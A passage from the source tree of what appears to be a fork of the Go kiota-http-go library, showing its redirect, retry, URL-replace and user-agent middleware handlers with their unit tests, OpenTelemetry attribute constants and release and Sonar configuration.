| shouldRedirect := reqOption.GetShouldRedirect() != nil && reqOption.GetShouldRedirect()(req, response) || reqOption.GetShouldRedirect() == nil 112 | if middleware.isRedirectResponse(response) && 113 | redirectCount < reqOption.GetMaxRedirect() && 114 | shouldRedirect { 115 | redirectCount++ 116 | redirectRequest, err := middleware.getRedirectRequest(req, response) 117 | if err != nil { 118 | return response, err 119 | } 120 | if observabilityName != "" { 121 | ctx, span := otel.GetTracerProvider().Tracer(observabilityName).Start(ctx, "RedirectHandler_Intercept - redirect "+fmt.Sprint(redirectCount)) 122 | span.SetAttributes(attribute.Int("com.microsoft.kiota.handler.redirect.count", redirectCount), 123 | httpResponseStatusCodeAttribute.Int(response.StatusCode), 124 | ) 125 | defer span.End() 126 | redirectRequest = redirectRequest.WithContext(ctx) 127 | } 128 | 129 | result, err := pipeline.Next(redirectRequest, middlewareIndex) 130 | if err != nil { 131 | return result, err 132 | } 133 | return middleware.redirectRequest(ctx, pipeline, middlewareIndex, reqOption, redirectRequest, result, redirectCount, observabilityName) 134 | } 135 | return response, nil 136 | } 137 | 138 | func (middleware RedirectHandler) isRedirectResponse(response *nethttp.Response) bool { 139 | if response == nil { 140 | return false 141 | } 142 | locationHeader := response.Header.Get(locationHeader) 143 | if locationHeader == "" { 144 | return false 145 | } 146 | statusCode := response.StatusCode 147 | return statusCode == movedPermanently || statusCode == found || statusCode == seeOther || statusCode == temporaryRedirect || statusCode == permanentRedirect 148 | } 149 | 150 | func (middleware RedirectHandler) getRedirectRequest(request *nethttp.Request, response *nethttp.Response) (*nethttp.Request, error) { 151 | if request == nil || response == nil { 152 | return nil, errors.New("request or response is nil") 153 | } 154 | locationHeaderValue := response.Header.Get(locationHeader) 155 | 
if locationHeaderValue[0] == '/' { 156 | locationHeaderValue = request.URL.Scheme + "://" + request.URL.Host + locationHeaderValue 157 | } 158 | result := request.Clone(request.Context()) 159 | targetUrl, err := url.Parse(locationHeaderValue) 160 | if err != nil { 161 | return nil, err 162 | } 163 | result.URL = targetUrl 164 | if result.Host != targetUrl.Host { 165 | result.Host = targetUrl.Host 166 | } 167 | sameHost := strings.EqualFold(targetUrl.Host, request.URL.Host) 168 | sameScheme := strings.EqualFold(targetUrl.Scheme, request.URL.Scheme) 169 | if !sameHost || !sameScheme { 170 | result.Header.Del("Authorization") 171 | } 172 | if response.StatusCode == seeOther { 173 | result.Method = nethttp.MethodGet 174 | result.Header.Del("Content-Type") 175 | result.Header.Del("Content-Length") 176 | result.Body = nil 177 | } 178 | return result, nil 179 | } 180 | -------------------------------------------------------------------------------- /redirect_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp "net/http" 5 | httptest "net/http/httptest" 6 | testing "testing" 7 | 8 | "strconv" 9 | 10 | assert "github.com/stretchr/testify/assert" 11 | ) 12 | 13 | func TestItCreatesANewRedirectHandler(t *testing.T) { 14 | handler := NewRedirectHandler() 15 | if handler == nil { 16 | t.Error("handler is nil") 17 | } 18 | } 19 | 20 | func TestItDoesntRedirectWithoutMiddleware(t *testing.T) { 21 | requestCount := int64(0) 22 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 23 | requestCount++ 24 | res.Header().Set("Location", "/"+strconv.FormatInt(requestCount, 10)) 25 | res.WriteHeader(301) 26 | res.Write([]byte("body")) 27 | })) 28 | defer func() { testServer.Close() }() 29 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 30 | if err != nil { 31 | t.Error(err) 32 | } 33 | client := 
getDefaultClientWithoutMiddleware() 34 | resp, err := client.Do(req) 35 | if err != nil { 36 | t.Error(err) 37 | } 38 | assert.NotNil(t, resp) 39 | assert.Equal(t, int64(1), requestCount) 40 | } 41 | 42 | func TestItHonoursShouldRedirect(t *testing.T) { 43 | requestCount := int64(0) 44 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 45 | requestCount++ 46 | res.Header().Set("Location", "/"+strconv.FormatInt(requestCount, 10)) 47 | res.WriteHeader(301) 48 | res.Write([]byte("body")) 49 | })) 50 | defer func() { testServer.Close() }() 51 | handler := NewRedirectHandlerWithOptions(RedirectHandlerOptions{ 52 | ShouldRedirect: func(req *nethttp.Request, res *nethttp.Response) bool { 53 | return false 54 | }, 55 | }) 56 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 57 | if err != nil { 58 | t.Error(err) 59 | } 60 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 61 | if err != nil { 62 | t.Error(err) 63 | } 64 | assert.NotNil(t, resp) 65 | assert.Equal(t, int64(1), requestCount) 66 | } 67 | 68 | func TestItHonoursMaxRedirect(t *testing.T) { 69 | requestCount := int64(0) 70 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 71 | requestCount++ 72 | res.Header().Set("Location", "/"+strconv.FormatInt(requestCount, 10)) 73 | res.WriteHeader(301) 74 | res.Write([]byte("body")) 75 | })) 76 | defer func() { testServer.Close() }() 77 | handler := NewRedirectHandler() 78 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 79 | if err != nil { 80 | t.Error(err) 81 | } 82 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 83 | if err != nil { 84 | t.Error(err) 85 | } 86 | assert.NotNil(t, resp) 87 | assert.Equal(t, int64(defaultMaxRedirects+1), requestCount) 88 | } 89 | 90 | func TestItStripsAuthorizationHeaderOnDifferentHost(t *testing.T) { 91 | testServer := 
httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 92 | res.Header().Set("Location", "https://www.bing.com/") 93 | res.WriteHeader(301) 94 | res.Write([]byte("body")) 95 | })) 96 | defer func() { testServer.Close() }() 97 | handler := NewRedirectHandler() 98 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 99 | if err != nil { 100 | t.Error(err) 101 | } 102 | req.Header.Set("Authorization", "Bearer 12345") 103 | client := getDefaultClientWithoutMiddleware() 104 | resp, err := client.Do(req) 105 | if err != nil { 106 | t.Error(err) 107 | } 108 | result, err := handler.getRedirectRequest(req, resp) 109 | if err != nil { 110 | t.Error(err) 111 | } 112 | assert.NotNil(t, result) 113 | assert.Equal(t, "www.bing.com", result.Host) 114 | assert.Equal(t, "", result.Header.Get("Authorization")) 115 | } 116 | -------------------------------------------------------------------------------- /release-please-config.json: -------------------------------------------------------------------------------- 1 | { 2 | "release-type": "go", 3 | "bump-minor-pre-major": true, 4 | "bump-patch-for-minor-pre-major": true, 5 | "include-component-in-tag": false, 6 | "include-v-in-tag": true, 7 | "packages": { 8 | ".": { 9 | "package-name": "github.com/ordinaryhydr/kiota-http-go", 10 | "changelog-path": "CHANGELOG.md", 11 | "extra-files": [ 12 | "user_agent_handler.go" 13 | ] 14 | } 15 | }, 16 | "$schema": "https://raw.githubusercontent.com/googleapis/release-please/main/schemas/config.json" 17 | } 18 | -------------------------------------------------------------------------------- /retry_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "io" 7 | "math" 8 | nethttp "net/http" 9 | "strconv" 10 | "time" 11 | 12 | abs "github.com/microsoft/kiota-abstractions-go" 13 | "go.opentelemetry.io/otel" 14 | 
"go.opentelemetry.io/otel/attribute" 15 | "go.opentelemetry.io/otel/trace" 16 | ) 17 | 18 | // RetryHandler handles transient HTTP responses and retries the request given the retry options 19 | type RetryHandler struct { 20 | // default options to use when evaluating the response 21 | options RetryHandlerOptions 22 | } 23 | 24 | // NewRetryHandler creates a new RetryHandler with default options 25 | func NewRetryHandler() *RetryHandler { 26 | return NewRetryHandlerWithOptions(RetryHandlerOptions{ 27 | ShouldRetry: func(delay time.Duration, executionCount int, request *nethttp.Request, response *nethttp.Response) bool { 28 | return true 29 | }, 30 | }) 31 | } 32 | 33 | // NewRetryHandlerWithOptions creates a new RetryHandler with the given options 34 | func NewRetryHandlerWithOptions(options RetryHandlerOptions) *RetryHandler { 35 | return &RetryHandler{options: options} 36 | } 37 | 38 | const defaultMaxRetries = 3 39 | const absoluteMaxRetries = 10 40 | const defaultDelaySeconds = 3 41 | const absoluteMaxDelaySeconds = 180 42 | 43 | // RetryHandlerOptions to apply when evaluating the response for retrial 44 | type RetryHandlerOptions struct { 45 | // Callback to determine if the request should be retried 46 | ShouldRetry func(delay time.Duration, executionCount int, request *nethttp.Request, response *nethttp.Response) bool 47 | // The maximum number of times a request can be retried 48 | MaxRetries int 49 | // The delay in seconds between retries 50 | DelaySeconds int 51 | } 52 | 53 | type retryHandlerOptionsInt interface { 54 | abs.RequestOption 55 | GetShouldRetry() func(delay time.Duration, executionCount int, request *nethttp.Request, response *nethttp.Response) bool 56 | GetDelaySeconds() int 57 | GetMaxRetries() int 58 | } 59 | 60 | var retryKeyValue = abs.RequestOptionKey{ 61 | Key: "RetryHandler", 62 | } 63 | 64 | // GetKey returns the key value to be used when the option is added to the request context 65 | func (options *RetryHandlerOptions) GetKey() 
abs.RequestOptionKey { 66 | return retryKeyValue 67 | } 68 | 69 | // GetShouldRetry returns the should retry callback function which evaluates the response for retrial 70 | func (options *RetryHandlerOptions) GetShouldRetry() func(delay time.Duration, executionCount int, request *nethttp.Request, response *nethttp.Response) bool { 71 | return options.ShouldRetry 72 | } 73 | 74 | // GetDelaySeconds returns the delays in seconds between retries 75 | func (options *RetryHandlerOptions) GetDelaySeconds() int { 76 | if options.DelaySeconds < 1 { 77 | return defaultDelaySeconds 78 | } else if options.DelaySeconds > absoluteMaxDelaySeconds { 79 | return absoluteMaxDelaySeconds 80 | } else { 81 | return options.DelaySeconds 82 | } 83 | } 84 | 85 | // GetMaxRetries returns the maximum number of times a request can be retried 86 | func (options *RetryHandlerOptions) GetMaxRetries() int { 87 | if options.MaxRetries < 1 { 88 | return defaultMaxRetries 89 | } else if options.MaxRetries > absoluteMaxRetries { 90 | return absoluteMaxRetries 91 | } else { 92 | return options.MaxRetries 93 | } 94 | } 95 | 96 | const retryAttemptHeader = "Retry-Attempt" 97 | const retryAfterHeader = "Retry-After" 98 | 99 | const tooManyRequests = 429 100 | const serviceUnavailable = 503 101 | const gatewayTimeout = 504 102 | 103 | // Intercept implements the interface and evaluates whether to retry a failed request. 
104 | func (middleware RetryHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *nethttp.Request) (*nethttp.Response, error) { 105 | obsOptions := GetObservabilityOptionsFromRequest(req) 106 | ctx := req.Context() 107 | var span trace.Span 108 | var observabilityName string 109 | if obsOptions != nil { 110 | observabilityName = obsOptions.GetTracerInstrumentationName() 111 | ctx, span = otel.GetTracerProvider().Tracer(observabilityName).Start(ctx, "RetryHandler_Intercept") 112 | span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.retry.enable", true)) 113 | defer span.End() 114 | req = req.WithContext(ctx) 115 | } 116 | response, err := pipeline.Next(req, middlewareIndex) 117 | if err != nil { 118 | return response, err 119 | } 120 | reqOption, ok := req.Context().Value(retryKeyValue).(retryHandlerOptionsInt) 121 | if !ok { 122 | reqOption = &middleware.options 123 | } 124 | return middleware.retryRequest(ctx, pipeline, middlewareIndex, reqOption, req, response, 0, 0, observabilityName) 125 | } 126 | 127 | func (middleware RetryHandler) retryRequest(ctx context.Context, pipeline Pipeline, middlewareIndex int, options retryHandlerOptionsInt, req *nethttp.Request, resp *nethttp.Response, executionCount int, cumulativeDelay time.Duration, observabilityName string) (*nethttp.Response, error) { 128 | if middleware.isRetriableErrorCode(resp.StatusCode) && 129 | middleware.isRetriableRequest(req) && 130 | executionCount < options.GetMaxRetries() && 131 | cumulativeDelay < time.Duration(absoluteMaxDelaySeconds)*time.Second && 132 | options.GetShouldRetry()(cumulativeDelay, executionCount, req, resp) { 133 | executionCount++ 134 | delay := middleware.getRetryDelay(req, resp, options, executionCount) 135 | cumulativeDelay += delay 136 | req.Header.Set(retryAttemptHeader, strconv.Itoa(executionCount)) 137 | if req.Body != nil { 138 | s, ok := req.Body.(io.Seeker) 139 | if ok { 140 | s.Seek(0, io.SeekStart) 141 | } 142 | } 143 | if observabilityName != "" 
{ 144 | ctx, span := otel.GetTracerProvider().Tracer(observabilityName).Start(ctx, "RetryHandler_Intercept - attempt "+fmt.Sprint(executionCount)) 145 | span.SetAttributes(attribute.Int("http.request.resend_count", executionCount), 146 | 147 | httpResponseStatusCodeAttribute.Int(resp.StatusCode), 148 | attribute.Float64("http.request.resend_delay", delay.Seconds()), 149 | ) 150 | defer span.End() 151 | req = req.WithContext(ctx) 152 | } 153 | t := time.NewTimer(delay) 154 | select { 155 | case <-ctx.Done(): 156 | // Return without retrying if the context was cancelled. 157 | return nil, ctx.Err() 158 | 159 | // Leaving this case empty causes it to exit the switch-block. 160 | case <-t.C: 161 | } 162 | response, err := pipeline.Next(req, middlewareIndex) 163 | if err != nil { 164 | return response, err 165 | } 166 | return middleware.retryRequest(ctx, pipeline, middlewareIndex, options, req, response, executionCount, cumulativeDelay, observabilityName) 167 | } 168 | return resp, nil 169 | } 170 | 171 | func (middleware RetryHandler) isRetriableErrorCode(code int) bool { 172 | return code == tooManyRequests || code == serviceUnavailable || code == gatewayTimeout 173 | } 174 | func (middleware RetryHandler) isRetriableRequest(req *nethttp.Request) bool { 175 | isBodiedMethod := req.Method == "POST" || req.Method == "PUT" || req.Method == "PATCH" 176 | if isBodiedMethod && req.Body != nil { 177 | return req.ContentLength != -1 178 | } 179 | return true 180 | } 181 | 182 | func (middleware RetryHandler) getRetryDelay(req *nethttp.Request, resp *nethttp.Response, options retryHandlerOptionsInt, executionCount int) time.Duration { 183 | retryAfter := resp.Header.Get(retryAfterHeader) 184 | if retryAfter != "" { 185 | retryAfterDelay, err := strconv.ParseFloat(retryAfter, 64) 186 | if err == nil { 187 | return time.Duration(retryAfterDelay) * time.Second 188 | } 189 | 190 | // parse the header if it's a date 191 | t, err := time.Parse(time.RFC1123, retryAfter) 192 | if err 
== nil { 193 | return t.Sub(time.Now()) 194 | } 195 | } 196 | return time.Duration(math.Pow(float64(options.GetDelaySeconds()), float64(executionCount))) * time.Second 197 | } 198 | -------------------------------------------------------------------------------- /retry_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "context" 5 | nethttp "net/http" 6 | httptest "net/http/httptest" 7 | testing "testing" 8 | "time" 9 | 10 | "strconv" 11 | 12 | assert "github.com/stretchr/testify/assert" 13 | ) 14 | 15 | type NoopPipeline struct { 16 | client *nethttp.Client 17 | } 18 | 19 | func (pipeline *NoopPipeline) Next(req *nethttp.Request, middlewareIndex int) (*nethttp.Response, error) { 20 | return pipeline.client.Do(req) 21 | } 22 | func newNoopPipeline() *NoopPipeline { 23 | return &NoopPipeline{ 24 | client: getDefaultClientWithoutMiddleware(), 25 | } 26 | } 27 | func TestItCreatesANewRetryHandler(t *testing.T) { 28 | handler := NewRetryHandler() 29 | if handler == nil { 30 | t.Error("handler is nil") 31 | } 32 | } 33 | func TestItAddsRetryAttemptHeaders(t *testing.T) { 34 | retryAttemptInt := 0 35 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 36 | retryAttempt := req.Header.Get("Retry-Attempt") 37 | if retryAttempt == "" { 38 | res.WriteHeader(429) 39 | } else { 40 | res.WriteHeader(200) 41 | retryAttemptInt, _ = strconv.Atoi(retryAttempt) 42 | } 43 | res.Write([]byte("body")) 44 | })) 45 | defer func() { testServer.Close() }() 46 | handler := NewRetryHandler() 47 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 48 | if err != nil { 49 | t.Error(err) 50 | } 51 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 52 | if err != nil { 53 | t.Error(err) 54 | } 55 | assert.NotNil(t, resp) 56 | assert.Equal(t, 1, retryAttemptInt) 57 | } 58 | 59 | func TestItHonoursShouldRetry(t 
*testing.T) { 60 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 61 | retryAttempt := req.Header.Get("Retry-Attempt") 62 | if retryAttempt == "" { 63 | res.WriteHeader(429) 64 | } else { 65 | res.WriteHeader(200) 66 | } 67 | res.Write([]byte("body")) 68 | })) 69 | defer func() { testServer.Close() }() 70 | handler := NewRetryHandlerWithOptions(RetryHandlerOptions{ 71 | ShouldRetry: func(delay time.Duration, executionCount int, request *nethttp.Request, response *nethttp.Response) bool { 72 | return false 73 | }, 74 | }) 75 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 76 | if err != nil { 77 | t.Error(err) 78 | } 79 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 80 | if err != nil { 81 | t.Error(err) 82 | } 83 | assert.NotNil(t, resp) 84 | assert.Equal(t, 429, resp.StatusCode) 85 | } 86 | 87 | func TestItHonoursMaxRetries(t *testing.T) { 88 | retryAttemptInt := -1 89 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 90 | res.WriteHeader(429) 91 | retryAttemptInt++ 92 | res.Write([]byte("body")) 93 | })) 94 | defer func() { testServer.Close() }() 95 | handler := NewRetryHandler() 96 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 97 | if err != nil { 98 | t.Error(err) 99 | } 100 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 101 | if err != nil { 102 | t.Error(err) 103 | } 104 | assert.NotNil(t, resp) 105 | assert.Equal(t, 429, resp.StatusCode) 106 | assert.Equal(t, defaultMaxRetries, retryAttemptInt) 107 | } 108 | 109 | func TestItHonoursRetryAfterDate(t *testing.T) { 110 | retryAttemptInt := -1 111 | start := time.Now() 112 | retryAfterTimeStr := start.Add(4 * time.Second).Format(time.RFC1123) 113 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 114 | res.Header().Set("Retry-After", retryAfterTimeStr) 
115 | res.WriteHeader(429) 116 | retryAttemptInt++ 117 | res.Write([]byte("body")) 118 | })) 119 | 120 | defer func() { testServer.Close() }() 121 | handler := NewRetryHandler() 122 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 123 | if err != nil { 124 | t.Error(err) 125 | } 126 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 127 | if err != nil { 128 | t.Error(err) 129 | } 130 | assert.NotNil(t, resp) 131 | end := time.Now() 132 | 133 | assert.Equal(t, defaultMaxRetries, retryAttemptInt) 134 | assert.Greater(t, end.Sub(start), 3*time.Second) // delay should be greater than 3 seconds (ignoring microsecond differences) 135 | } 136 | 137 | func TestItHonoursContextExpiry(t *testing.T) { 138 | retryAttemptInt := -1 139 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 140 | res.Header().Set("Retry-After", "5") 141 | res.WriteHeader(429) 142 | retryAttemptInt++ 143 | res.Write([]byte("body")) 144 | })) 145 | defer func() { testServer.Close() }() 146 | ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second) 147 | defer cancel() 148 | handler := NewRetryHandler() 149 | req, err := nethttp.NewRequestWithContext(ctx, nethttp.MethodGet, testServer.URL, nil) 150 | if err != nil { 151 | t.Error(err) 152 | } 153 | start := time.Now() 154 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 155 | end := time.Now() 156 | assert.Error(t, err) 157 | assert.Nil(t, resp) 158 | // Should not have retried because context expired. 
159 | assert.Equal(t, 0, retryAttemptInt) 160 | assert.Less(t, end.Sub(start), 4*time.Second) 161 | } 162 | 163 | func TestItHonoursContextCancelled(t *testing.T) { 164 | retryAttemptInt := -1 165 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 166 | res.Header().Set("Retry-After", "5") 167 | res.WriteHeader(429) 168 | retryAttemptInt++ 169 | res.Write([]byte("body")) 170 | })) 171 | defer func() { testServer.Close() }() 172 | ctx, cancel := context.WithCancel(context.Background()) 173 | handler := NewRetryHandler() 174 | req, err := nethttp.NewRequestWithContext(ctx, nethttp.MethodGet, testServer.URL, nil) 175 | if err != nil { 176 | t.Error(err) 177 | } 178 | go func() { 179 | time.Sleep(1 * time.Second) 180 | cancel() 181 | }() 182 | start := time.Now() 183 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 184 | end := time.Now() 185 | assert.Error(t, err) 186 | assert.Nil(t, resp) 187 | // Should not have retried because context expired. 
188 | assert.Equal(t, 0, retryAttemptInt) 189 | assert.Less(t, end.Sub(start), 4*time.Second) 190 | } 191 | 192 | func TestItDoesntRetryOnSuccess(t *testing.T) { 193 | retryAttemptInt := -1 194 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 195 | res.WriteHeader(200) 196 | retryAttemptInt++ 197 | res.Write([]byte("body")) 198 | })) 199 | defer func() { testServer.Close() }() 200 | handler := NewRetryHandler() 201 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 202 | if err != nil { 203 | t.Error(err) 204 | } 205 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 206 | if err != nil { 207 | t.Error(err) 208 | } 209 | assert.NotNil(t, resp) 210 | assert.Equal(t, 0, retryAttemptInt) 211 | } 212 | -------------------------------------------------------------------------------- /sonar-project.properties: -------------------------------------------------------------------------------- 1 | sonar.projectKey=microsoft_kiota-http-go 2 | sonar.organization=microsoft 3 | sonar.exclusions=**/*_test.go 4 | sonar.test.inclusions=**/*_test.go 5 | sonar.go.tests.reportPaths=result.out 6 | sonar.go.coverage.reportPaths=cover.out -------------------------------------------------------------------------------- /span_attributes.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import "go.opentelemetry.io/otel/attribute" 4 | 5 | // HTTP Request attributes 6 | const ( 7 | httpRequestBodySizeAttribute = attribute.Key("http.request.body.size") 8 | httpRequestResendCountAttribute = attribute.Key("http.request.resend_count") 9 | httpRequestMethodAttribute = attribute.Key("http.request.method") 10 | httpRequestHeaderContentTypeAttribute = attribute.Key("http.request.header.content-type") 11 | ) 12 | 13 | // HTTP Response attributes 14 | const ( 15 | httpResponseBodySizeAttribute = attribute.Key("http.response.body.size") 16 | 
httpResponseHeaderContentTypeAttribute = attribute.Key("http.response.header.content-type") 17 | httpResponseStatusCodeAttribute = attribute.Key("http.response.status_code") 18 | ) 19 | 20 | // Network attributes 21 | const ( 22 | networkProtocolNameAttribute = attribute.Key("network.protocol.name") 23 | ) 24 | 25 | // Server attributes 26 | const ( 27 | serverAddressAttribute = attribute.Key("server.address") 28 | ) 29 | 30 | // URL attributes 31 | const ( 32 | urlFullAttribute = attribute.Key("url.full") 33 | urlSchemeAttribute = attribute.Key("url.scheme") 34 | urlUriTemplateAttribute = attribute.Key("url.uri_template") 35 | ) 36 | -------------------------------------------------------------------------------- /url_replace_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | abstractions "github.com/microsoft/kiota-abstractions-go" 5 | "go.opentelemetry.io/otel" 6 | "go.opentelemetry.io/otel/attribute" 7 | "go.opentelemetry.io/otel/trace" 8 | "net/http" 9 | "strings" 10 | ) 11 | 12 | var urlReplaceOptionKey = abstractions.RequestOptionKey{Key: "UrlReplaceOptionKey"} 13 | 14 | // UrlReplaceHandler is a middleware handler that replaces url segments in the uri path. 
15 | type UrlReplaceHandler struct { 16 | options UrlReplaceOptions 17 | } 18 | 19 | // NewUrlReplaceHandler creates a configuration object for the CompressionHandler 20 | func NewUrlReplaceHandler(enabled bool, replacementPairs map[string]string) *UrlReplaceHandler { 21 | return &UrlReplaceHandler{UrlReplaceOptions{Enabled: enabled, ReplacementPairs: replacementPairs}} 22 | } 23 | 24 | // UrlReplaceOptions is a configuration object for the UrlReplaceHandler middleware 25 | type UrlReplaceOptions struct { 26 | Enabled bool 27 | ReplacementPairs map[string]string 28 | } 29 | 30 | // GetKey returns UrlReplaceOptions unique name in context object 31 | func (u *UrlReplaceOptions) GetKey() abstractions.RequestOptionKey { 32 | return urlReplaceOptionKey 33 | } 34 | 35 | // GetReplacementPairs reads ReplacementPairs settings from UrlReplaceOptions 36 | func (u *UrlReplaceOptions) GetReplacementPairs() map[string]string { 37 | return u.ReplacementPairs 38 | } 39 | 40 | // IsEnabled reads Enabled setting from UrlReplaceOptions 41 | func (u *UrlReplaceOptions) IsEnabled() bool { 42 | return u.Enabled 43 | } 44 | 45 | type urlReplaceOptionsInt interface { 46 | abstractions.RequestOption 47 | IsEnabled() bool 48 | GetReplacementPairs() map[string]string 49 | } 50 | 51 | // Intercept is invoked by the middleware pipeline to either move the request/response 52 | // to the next middleware in the pipeline 53 | func (c *UrlReplaceHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *http.Request) (*http.Response, error) { 54 | reqOption, ok := req.Context().Value(urlReplaceOptionKey).(urlReplaceOptionsInt) 55 | if !ok { 56 | reqOption = &c.options 57 | } 58 | 59 | obsOptions := GetObservabilityOptionsFromRequest(req) 60 | ctx := req.Context() 61 | var span trace.Span 62 | if obsOptions != nil { 63 | ctx, span = otel.GetTracerProvider().Tracer(obsOptions.GetTracerInstrumentationName()).Start(ctx, "UrlReplaceHandler_Intercept") 64 | 
span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.url_replacer.enable", true)) 65 | defer span.End() 66 | req = req.WithContext(ctx) 67 | } 68 | 69 | if !reqOption.IsEnabled() || len(reqOption.GetReplacementPairs()) == 0 { 70 | return pipeline.Next(req, middlewareIndex) 71 | } 72 | 73 | req.URL.Path = ReplacePathTokens(req.URL.Path, reqOption.GetReplacementPairs()) 74 | 75 | if span != nil { 76 | span.SetAttributes(attribute.String("http.request_url", req.RequestURI)) 77 | } 78 | 79 | return pipeline.Next(req, middlewareIndex) 80 | } 81 | 82 | // ReplacePathTokens invokes token replacement logic on the given url path 83 | func ReplacePathTokens(path string, replacementPairs map[string]string) string { 84 | for key, value := range replacementPairs { 85 | path = strings.Replace(path, key, value, 1) 86 | } 87 | return path 88 | } 89 | -------------------------------------------------------------------------------- /url_replace_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "errors" 5 | "github.com/stretchr/testify/assert" 6 | nethttp "net/http" 7 | "testing" 8 | ) 9 | 10 | type SpyPipeline struct { 11 | client *nethttp.Client 12 | receivedRequest *nethttp.Request 13 | } 14 | 15 | func (pipeline *SpyPipeline) Next(req *nethttp.Request, middlewareIndex int) (*nethttp.Response, error) { 16 | pipeline.receivedRequest = req 17 | return nil, errors.New("Spy executor only") 18 | } 19 | func newSpyPipeline() *SpyPipeline { 20 | return &SpyPipeline{ 21 | client: getDefaultClientWithoutMiddleware(), 22 | } 23 | } 24 | func (pipeline *SpyPipeline) GetReceivedRequest() *nethttp.Request { 25 | return pipeline.receivedRequest 26 | } 27 | 28 | func TestURLReplacementHandler(t *testing.T) { 29 | 30 | handler := NewUrlReplaceHandler(true, map[string]string{"/users/me-token-to-replace": "/me"}) 31 | if handler == nil { 32 | t.Error("handler is nil") 33 | } 34 | url := 
"https://msgraph.com/users/me-token-to-replace/contactFolders" 35 | req, err := nethttp.NewRequest(nethttp.MethodGet, url, nil) 36 | if err != nil { 37 | t.Error(err) 38 | } 39 | 40 | pipeline := newSpyPipeline() 41 | _, _ = handler.Intercept(pipeline, 0, req) 42 | 43 | assert.Equal(t, pipeline.GetReceivedRequest().URL.Path, "/me/contactFolders") 44 | } 45 | -------------------------------------------------------------------------------- /user_agent_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "fmt" 5 | nethttp "net/http" 6 | "strings" 7 | 8 | abs "github.com/microsoft/kiota-abstractions-go" 9 | "go.opentelemetry.io/otel" 10 | "go.opentelemetry.io/otel/attribute" 11 | ) 12 | 13 | // UserAgentHandler adds the product to the user agent header. 14 | type UserAgentHandler struct { 15 | options UserAgentHandlerOptions 16 | } 17 | 18 | // NewUserAgentHandler creates a new user agent handler with the default options. 19 | func NewUserAgentHandler() *UserAgentHandler { 20 | return NewUserAgentHandlerWithOptions(nil) 21 | } 22 | 23 | // NewUserAgentHandlerWithOptions creates a new user agent handler with the specified options. 24 | func NewUserAgentHandlerWithOptions(options *UserAgentHandlerOptions) *UserAgentHandler { 25 | if options == nil { 26 | options = NewUserAgentHandlerOptions() 27 | } 28 | return &UserAgentHandler{ 29 | options: *options, 30 | } 31 | } 32 | 33 | // UserAgentHandlerOptions to use when adding the product to the user agent header. 34 | type UserAgentHandlerOptions struct { 35 | Enabled bool 36 | ProductName string 37 | ProductVersion string 38 | } 39 | 40 | // NewUserAgentHandlerOptions creates a new user agent handler options with the default values. 
